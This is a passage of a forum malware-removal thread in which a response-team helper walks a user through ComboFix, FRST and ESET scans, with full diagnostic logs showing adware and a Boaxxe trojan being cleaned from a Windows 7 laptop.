@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.14"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\McAfee]
"SymbolicLinkValue"=hex(6):5c,00,72,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
   00,5c,00,6d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\
.
Completion time: 2014-07-17  09:58:35
ComboFix-quarantined-files.txt  2014-07-17 13:58
ComboFix2.txt  2014-07-17 02:08
.
Pre-Run: 288,317,480,960 bytes free
Post-Run: 288,296,718,336 bytes free
.
- - End Of File - - 39968946DE27DF415313168748D38DFB
A36C5E4F47E84449FF07ED3517B43A31
 



#8 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:05 PM

Posted 17 July 2014 - 09:49 AM

The 'Surrogates' went away immediately. I have never seen this behavior before. Somewhere during the run the task manager went away too.
I assume ComboFix was killing these tasks.

That's right. Combofix is killing processes to minimize possible interference of the malware in the cleanup. This is its normal behavior. But thank you for reporting what you've observed. Detailed feedback can only help.

Let's give FRST a shot.
This time make sure that these zombified instances of dllhost.exe are not running (e.g. unplug from network and kill them in taskmanager) and then run the following FRST fix:


Please download this attached Attached File  fixlist.txt   1.02KB   11 downloads and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


#9 scooter2028

scooter2028
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:05 AM

Posted 17 July 2014 - 03:10 PM

Here is the FRST log.  It was run as specified.

 

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 15-07-2014 01
Ran by Ric at 2014-07-17 15:47:08 Run:2
Running from C:\Users\Ric\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
DeleteKey: HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
2014-06-25 19:50 - 2014-07-06 13:39 - 00000000 ____D () C:\ProgramData\IculOnse
2014-06-25 19:54 - 2014-06-25 20:02 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Feeqvena
HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\.exe: exefile =>  <===== ATTENTION!
HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\exefile:  <===== ATTENTION!
AlternateDataStreams: C:\Users\Ric\Local Settings:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local\Application Data:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local\QX98MGlBll:ICLtGXGuvbHk9JsjsurofG6fTog
AlternateDataStreams: C:\Users\Ric\AppData\Local\Temp:u7mOtr3DxOBSIqOEV
REG: reg query "HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s
Reboot:
*****************

HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => Key Deleted Successfully.
C:\ProgramData\IculOnse => Moved successfully.
C:\Users\Ric\AppData\Roaming\Feeqvena => Moved successfully.
'HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\.exe'=> Key not found.
'HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\exefile' => Key deleted successfully.
"C:\Users\Ric\Local Settings" => ":eze3UMfrJWx7rnYl4ZabQcSdDo9" ADS not found.
C:\Users\Ric\AppData\Local => ":eze3UMfrJWx7rnYl4ZabQcSdDo9" ADS removed successfully.
"C:\Users\Ric\AppData\Local\Application Data" => ":eze3UMfrJWx7rnYl4ZabQcSdDo9" ADS not found.
C:\Users\Ric\AppData\Local\QX98MGlBll => ":ICLtGXGuvbHk9JsjsurofG6fTog" ADS removed successfully.
C:\Users\Ric\AppData\Local\Temp => ":u7mOtr3DxOBSIqOEV" ADS removed successfully.

========= reg query "HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s =========

ERROR: The system was unable to find the specified registry key or value.

========= End of Reg: =========

 

The system needed a reboot.

==== End of Fixlog ====



#10 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:05 PM

Posted 17 July 2014 - 03:28 PM

Hi,

this looks good. How is your computer running now after the reboot? Are there still those zombified dllhost.exe instances or have they vanished?
Let's do a check up:


Step 1

Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administartor privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!



Step 2

Start FRST with administator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#11 scooter2028

scooter2028
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:05 AM

Posted 17 July 2014 - 09:17 PM

They've apparently moved the location of some of the run parameters:

 

- The 'Remove found threats' is in the 'Advanced Settings'. - I unchecked it.

- 'Scan Archives' is in the Advanced settings - I checked it.

- 'Scan for potentially unwanted applications' is not in the Advanced Section but before it and has 2 radio buttons.  1 to Enable & 1 to disable.  I enabled.

- 'Enable  Anti-Stealth technology' - checked in Advance as specified.

So I ran the scan with specifications as you requested.

 

Very optimistic.  The dllhost.exe procs are gone - but I've spoken too soon before.  Before my very first post, I prematurely proclaimed success only to have them start up again.  However - they sometimes might wait 5 to 10 minutes to start up, but now it's been about 5 hours with no trace.  .
 

ESET Log here::

 

 

C:\AdwCleaner\Quarantine\C\Program Files (x86)\centurytoolbar\centurytoolbarDx.dll.vir a variant of Win32/Toolbar.Visicom.B potentially unwanted application
C:\AdwCleaner\Quarantine\C\Program Files (x86)\centurytoolbar\centurytoolbartb.dll.vir a variant of Win32/Toolbar.Visicom.A potentially unwanted application
C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Temp\scoped_dir_16121\DealPly.crx Win32/DealPly.J potentially unwanted application
C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Temp\scoped_dir_16121\CRX_INSTALL\background.html Win32/DealPly.J potentially unwanted application
C:\Users\Ric\AppData\Local\UQmedia\msolui80.dll Win32/Boaxxe.BE trojan
C:\Users\Ric\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27\23684b1b-3ec5b6ac multiple threats
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\genfix2-a[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\search-update2[1] a variant of Win32/Distromatic.C potentially unwanted application
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\genfix-e[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\search-update-d[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\updater-startnow-200-2.5-d[1].exe a variant of Win32/Toolbar.Zugo potentially unwanted application
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\genfix2-a[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\search-update2[1] a variant of Win32/Distromatic.C potentially unwanted application
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\genfix-e[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\search-update-d[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\updater-startnow-200-2.5-d[1].exe a variant of Win32/Toolbar.Zugo potentially unwanted application
 



#12 scooter2028

scooter2028
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:05 AM

Posted 17 July 2014 - 09:20 PM

Forgot step 2 - running now.



#13 scooter2028

scooter2028
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:05 AM

Posted 17 July 2014 - 09:22 PM

STEP 2

 

FRST log

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 15-07-2014 01
Ran by Ric (administrator) on DELL-XPS-1645 on 17-07-2014 22:20:55
Running from C:\Users\Ric\Desktop
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\stacsv64.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Carbonite, Inc. (www.carbonite.com)) C:\Program Files\Carbonite\Carbonite Backup\CarboniteService.exe
() C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe
(Cyberlink) C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(PC Pitstop LLC) C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe
(QUALCOMM, Inc.) C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe
(Dropbox, Inc.) C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe

==================== Registry (Whitelisted) ==================

HKU\.DEFAULT\...\RunOnce: [{90140000-003D-0000-1000-0000000FF1CE}] - C:\Windows\system32\cmd.exe /C del "C:\ProgramData\Microsoft Help\Rgstrtn.lck" /Q /A:H
Startup: C:\Users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Green -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Partial -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Yellow -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: DropboxExt1 -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt2 -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt3 -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt4 -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: Carbonite.Green -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: Carbonite.Partial -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: Carbonite.Yellow -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: DropboxExt1 -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: DropboxExt2 -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: DropboxExt3 -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x9EFC09E253D5CB01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - DefaultScope value is missing.
SearchScopes: HKCU - DefaultScope {4C57D5F1-EA69-4478-82D3-94C509422F49} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKCU - {4C57D5F1-EA69-4478-82D3-94C509422F49} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKCU - {A3F26D1D-B8BE-4F06-BAE2-B3A52A885078} URL = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKCU - {DECA3892-BA8F-44b8-A993-A466AD694AE4} URL = http://search.yahoo.com/search?p={searchTerms}&fr=chr-offrhap
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll (Adobe Systems, Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKLM-x32 - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll (Adobe Systems, Inc.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
DPF: HKLM {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} https://support.dell.com/systemprofiler/SysProExe.CAB
DPF: HKLM-x32 {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} https://support.dell.com/systemprofiler/SysProExe.CAB
DPF: HKLM-x32 {C1F8FC10-E5DB-4112-9DBF-6C3FF728D4E3} http://support.dell.com/systemprofiler/DellSystemLite.CAB
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T28L10NSP12_CP1-16851/webex/ieatgpc1.cab
DPF: HKLM-x32 {FFB3A759-98B1-446F-BDA9-909C6EB18CC7} http://utilities.pcpitstop.com/Optimize3/pcpitstop2.dll
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.3.26 205.171.2.26

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll ()
FF Plugin: @microsoft.com/GENUINE - C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @canon.com/EPPEX - C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll (CANON INC.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/JavaPlugin - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE - C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin - C:\Users\Ric\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin - C:\Users\Ric\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Users\Ric\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Users\Ric\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin10171.dll (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
